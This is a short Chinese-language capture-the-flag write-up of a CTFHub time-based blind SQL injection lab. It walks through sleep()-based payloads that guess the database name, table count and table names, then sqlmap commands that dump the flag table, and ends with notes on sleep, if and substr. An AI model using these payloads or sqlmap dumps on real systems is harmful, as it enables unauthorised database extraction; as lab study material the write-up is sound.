data:image/s3,"s3://crabby-images/c18eb/c18eb3a8aca77d6fa536707dc2f7d51b4272e74b" alt=""
进入靶场
data:image/s3,"s3://crabby-images/8acb2/8acb236e338ef200bd3c1ff12524de25ceced844" alt=""
输入1
data:image/s3,"s3://crabby-images/dfb5f/dfb5fcf0642b6fa0ae28d189c39c9f544c7c8d61" alt=""
猜测其名称长度,为4时页面卡顿,确定长度
1 and if(length(database())=4,sleep(3),1)
根据之前几道题的经验,应该是sqli
1 and if(ascii(substr(database(),1,1))=115,sleep(3),1)
data:image/s3,"s3://crabby-images/9e863/9e863d1c1e42804235119ab1a0c35a85a10958c9" alt=""
1 and if(ascii(substr(database(),2,1))=113,sleep(3),1)
1 and if(ascii(substr(database(),3,1))=108,sleep(3),1)
data:image/s3,"s3://crabby-images/a54ad/a54adf2201ea186c62115dfba115549f0889a123" alt=""
1 and if(ascii(substr(database(),4,1))=105,sleep(3),1)
data:image/s3,"s3://crabby-images/75791/75791560fb29d30c1161c474ba112192d9a51327" alt=""
确定为sqli
1 and if((select count(table_name) from information_schema.tables
where table_schema=database())=2,sleep(3),1)
确定表有2个,使用以下语句判断表名
1 and if(ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=110,sleep(3),1)
假设我已经判断出new和flag了
继续用如上方法判断字段数,字段名,一个一个判断flag里面的元素
工作量太大了,上sqlmap
sqlmap -u CTFHub 技能学习 | 时间盲注/?id=1 --dbs
data:image/s3,"s3://crabby-images/1c34b/1c34bc21974b9e614a6ef1a08ae4b1ee2a5a27cd" alt=""
sqlmap -u CTFHub 技能学习 | 时间盲注/?id=1 -D sqli --tables
data:image/s3,"s3://crabby-images/2ffb7/2ffb76ae4f7a00d16b7646074a52dfc0da51f4a0" alt=""
sqlmap -u CTFHub 技能学习 | 时间盲注/?id=1 -D sqli -T flag --columns
data:image/s3,"s3://crabby-images/1bbf7/1bbf763d08af6fb3d38121fb835ad171ca3f2bf4" alt=""
sqlmap -u CTFHub 技能学习 | 时间盲注/?id=1 -D sqli -T flag -C flag --dump
data:image/s3,"s3://crabby-images/a1f63/a1f6330c78271a375e45469c4ba3f053ed494165" alt=""
笔记
1.时间盲注最重要的工具就是sleep(),括号里面的数字就是页面加载需要的时间
2,if(A,B,C)
这是if语句,A语句正确时运行B,A语句错误时运行C
3,
substr(string, start, length)
string:要截取的源字符串。
start:开始截取的位置。如果 start 为正数,从字符串的左边开始计数;如果为负数,从字符串的右边开始计数。
length:要截取的字符长度。